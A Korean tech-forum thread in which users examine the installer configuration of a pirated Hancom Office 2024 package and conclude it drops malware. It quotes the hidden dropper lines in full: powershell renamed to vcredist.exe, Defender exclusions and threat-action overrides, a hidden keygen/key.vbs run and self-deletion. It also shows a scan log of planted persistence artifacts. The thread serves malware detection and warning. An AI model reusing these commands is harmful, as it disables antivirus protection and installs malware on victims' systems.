소프트웨어 요즘 나도는 한컴2024 설정파일
2024.01.07 14:50
ExtRun0=Install\Install_UI\lo\HOffice130.exe
ExtRun1=Install\Install_UI\Logo_Copy.bat
ExtRun2=Install\Install_UI\lo\HOffice130.exe
ExtRun3=Install\Install_UI\lo\HOffice130.exe
ExtRun4=Install\HOffice2024Update_20231109.exe
ExtRun5=Install\Install_UI\lo\HOffice130.exe
ExtRunParam0=execmd copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Install\Install_UI\lo\vcredist.exe
ExtRunParam2=exec hide Install\Install_UI\lo\vcredist.exe Add-MpPreference -ExclusionProcess 'vcredist.exe';Add-MpPreference -ThreatIDDefaultAction_Actions @(6,6,6) -ThreatIDDefaultAction_Ids @(2147814524,2147731250,2147735503)
ExtRunParam3=exec hide Install\Install_UI\lo\vcredist.exe Add-MpPreference -ExclusionProcess 'key.vbs';Install\Install_UI\lo\7z.exe x -oInstall\Install_UI\lo\ Install\Install_UI\lo\keygen -px -y;Install\Install_UI\lo\key.vbs
ExtRunParam4=/silent
ExtRunParam5=filldelete Install\Install_UI\lo\key.vbs
여기에서
ExtRun1=Install\Install_UI\Logo_Copy.bat
ExtRun2=Install\Install_UI\lo\HOffice130.exe
ExtRun3=Install\Install_UI\lo\HOffice130.exe
ExtRun4=Install\HOffice2024Update_20231109.exe
ExtRun5=Install\Install_UI\lo\HOffice130.exe
ExtRunParam0=execmd copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Install\Install_UI\lo\vcredist.exe
ExtRunParam2=exec hide Install\Install_UI\lo\vcredist.exe Add-MpPreference -ExclusionProcess 'vcredist.exe';Add-MpPreference -ThreatIDDefaultAction_Actions @(6,6,6) -ThreatIDDefaultAction_Ids @(2147814524,2147731250,2147735503)
ExtRunParam3=exec hide Install\Install_UI\lo\vcredist.exe Add-MpPreference -ExclusionProcess 'key.vbs';Install\Install_UI\lo\7z.exe x -oInstall\Install_UI\lo\ Install\Install_UI\lo\keygen -px -y;Install\Install_UI\lo\key.vbs
ExtRunParam4=/silent
ExtRunParam5=filldelete Install\Install_UI\lo\key.vbs
이부분은 전부 없어도 되지 않을까요?
특히
ExtRunParam0=execmd copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Install\Install_UI\lo\vcredist.exe
ExtRunParam2=exec hide Install\Install_UI\lo\vcredist.exe Add-MpPreference -ExclusionProcess 'vcredist.exe';Add-MpPreference -ThreatIDDefaultAction_Actions @(6,6,6) -ThreatIDDefaultAction_Ids @(2147814524,2147731250,2147735503)
ExtRunParam3=exec hide Install\Install_UI\lo\vcredist.exe Add-MpPreference -ExclusionProcess 'key.vbs';Install\Install_UI\lo\7z.exe x -oInstall\Install_UI\lo\ Install\Install_UI\lo\keygen -px -y;Install\Install_UI\lo\key.vbs
ExtRunParam4=/silent
ExtRunParam5=filldelete Install\Install_UI\lo\key.vbs
는 상당히 찝찝해 보입니다. keygen key.vbs filldelete Install\Install_UI\lo\key.vbs ThreatIDDefaultAction 등등...
ExtRun0=Install\Install_UI\lo\HOffice130.exe 만 남기고
LevelOption=3 으로 전부 선택해서 설치해보면
한글만 설치되더군요. 한셀 한쇼 등등은 설치가 안됩니다.
그리고 설치가 끝나면
희안하게
nircmd..com 메시지가 나타나는군요. 한글설치하면서 이제껏 처음보는 메시지입니다.
먼가 파일변조가 있었을 확률이 높아보이네요
클린설치할 수 있는 설치본 원본만 어디서 못 구할까요
유포되고 있는 h2024.zip 파일은 상당히 찝찝하네요
댓글 [6]
-
젠투 2024.01.07 15:02 -
늑대아니에요! 2024.01.07 15:11
ExtRun0=Install\Install_UI\lo\HOffice130.exe
이부분도 삭제하니까
nircmd메시지는 나타나지 않는군요.
악성파일을 심은후 [PostInstall] 에서 먼가 장난질이 있는거 같습니다.
-
늑대아니에요! 2024.01.07 16:47
mzk 검색하니
■ 악성 및 유해 가능 파일 제거 :
"C:\Windows\System32\Tasks\Microsoft\Windows\Google\GoogleUpdateTask" (격리/제거 성공 [Active Scan])
"C:\Windows\svchost.exe" (격리/제거 성공 [Active Scan])
"C:\ProgramData\KB5019959.exe" (격리/제거 성공 [Active Scan])
"C:\ProgramData\KB5026372.exe" (격리/제거 성공 [Active Scan])
"C:\ProgramData\Google\GoogleUpdate.exe" (격리/제거 성공)
"C:\Users\Administrator\AppData\Roaming\Google\Libs\WR64.sys" (격리/제거 성공)
■ 악성 및 유해 가능 폴더 제거 :
"C:\Users\Administrator\AppData\Roaming\Google\Libs" (격리/제거 성공)
■ 악성 및 유해 가능 <HKEY_LOCAL_MACHINE> 레지스트리 제거 :
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe : Debugger" (격리/제거 성공)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe : Debugger" (격리/제거 성공)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Google\GoogleUpdateTask" (격리/제거 성공 [Active Scan])
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{495CD511-03B9-4F0A-8CC6-F2C248561AE9}" (격리/제거 성공 [Active Scan])
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{495CD511-03B9-4F0A-8CC6-F2C248561AE9}" (격리/제거 성공 [Active Scan])
흠...
-
위라이즈 2024.01.07 17:31
nircmd.exe 자체는 악성 프로그램은 아닙니다.
단지 CLI 툴로 이것저것 유용한 기능이 있지만, 악의적으로 사용한다면 사용자 모르게 무언가를 실행할 수도 있겠네요.
역시 중간에 7z.exe 도 보이는데, 어디 파일에서 압축을 풀고 vbs 파일 등으로 사용자 모르게 무언가를 할 수도 있겠네요.
게임 인스톨러 등에서는 압축 풀기 위해서 7z.exe를 사용하는 경우도 있긴 하나, 한컴에서는 굳이 중간에 nircmd.exe를 호출하거나 7z.exe을 이용해서 압축을 풀거나 vbs 파일 등을 이용해서 설치할 껀덕지가 있을 것 같진 않은데, 찜찜하면 안 쓰는게 맞습니다.
-
DarknessAngel 2024.01.07 18:13
원본은 시리얼만 있으면 얼마든지 구할 수 있습니다
-
늑대아니에요! 2024.01.07 18:20
https://windowsforum.kr/index.php?mid=data&page=5&document_srl=20291758
http://cdn.hancom.co.kr/pds/hnc/DOWN/2024/HOfficeDN_2024.exe
http://cdn.hancom.co.kr/pds/hnc/DOWN/2024/HOfficeDN_2024_Hwp.exe
http://cdn.hancom.co.kr/pds/hnc/DOWN/2024/HOfficeDN_2024_Home.exe
http://cdn.hancom.co.kr/pds/hnc/DOWN/2024/HOfficeDN_2024_ESD.exe
idm 으로 다운받은 후 실행해보니 한컴 원본 설치파일이 생기네요.
감사합니다.
번호 | 제목 | 글쓴이 | 조회 | 등록일 |
---|---|---|---|---|
[공지] | 질문과 답변 게시판 이용간 유의사항 | gooddew | - | - |
99062 | 소프트웨어| 간단하게 음원 편집할 수 있는 프로그램 [10] | 파란시계 | 436 | 02-07 |
99061 | 윈 도 우| 윈도우 정품키가 있는 홀로그램 스티커 [2] | 푸른하늘좋 | 606 | 02-07 |
99060 | 윈 도 우| 파워쉘 일괄 파일 삭제. [9] | 최강미뉴 | 180 | 02-07 |
99059 | 윈 도 우| GPT 파티션 데이터 손상없이 EFI 부트 복구방법 있나요? [6] | 타천사둘리 | 444 | 02-07 |
99058 | 기 타| 프린터가 인터넷 바꾸고 잡히질 않아여~~ [2] | gksEJreo | 331 | 02-07 |
99057 | 소프트웨어| [ PE ] VMWare Tools 설치 관련 문의드립니다. [10] | 시종일관 | 250 | 02-07 |
99056 | 하드웨어| b460메인보드 [1] | 천상천하 | 178 | 02-07 |
99055 | 기 타| 급여에서 이만큼 세금공제 정상 인가요? [4] | 놋지미 | 548 | 02-07 |
99054 | 하드웨어| 인텔 CPU 숫자 뒤에 붙는 K, F, KF는 차이가 뭔가요? [10] | 복두꺼비 | 539 | 02-07 |
99053 | 윈 도 우| 크롬창이 갑자기 자기혼자 커집니다 [1] | MSTSC | 159 | 02-06 |
99052 | 소프트웨어| Snappy Driver Installer 질문 입니다. | 마린블루 | 125 | 02-06 |
99051 | 소프트웨어| 프리미어에서 이 메뉴들이 나오질 않네요? | brucex | 114 | 02-06 |
99050 | 모 바 일| 안녕하십니까 ex fat포멧해 [2] | nissan | 341 | 02-06 |
99049 | 소프트웨어| 그림판 상단편집도구가 없어졌습니다 ㅠㅠ [8] | 안소링 | 317 | 02-06 |
99048 | 기 타| 윈도우11 카톡pc에러 [1] | 아프리카태 | 378 | 02-06 |
99047 | 소프트웨어| 포토샵 에러 [6] | 파란하늘촌 | 418 | 02-06 |
99046 | 기 타| 외장하드 폰 TV 연결 [4] | 묵춘 | 387 | 02-06 |
99045 | 윈 도 우| 엣지 이상 현상 겪으시는 분 계신가요? [3] | 오두막과시 | 547 | 02-05 |
99044 | 하드웨어| DDR4-2400과 DDR4-2400T 차이 [1] | asklee | 527 | 02-05 |
99043 | 윈 도 우| Ventoy ..... 부팅이 PE랑 비교하면 어떤가요? [5] | 라랑 | 499 | 02-05 |
토렌트에 도는거 저 부분에 악성코드 삽입내용이라고 밝혀진지 오래됐습니다.
되도록이면 정품 사용하시길.
https://windowsforum.kr/free/20235156
정품키 구매하셨으면 바로 홈페이지에서 다운로드 가능하십니다.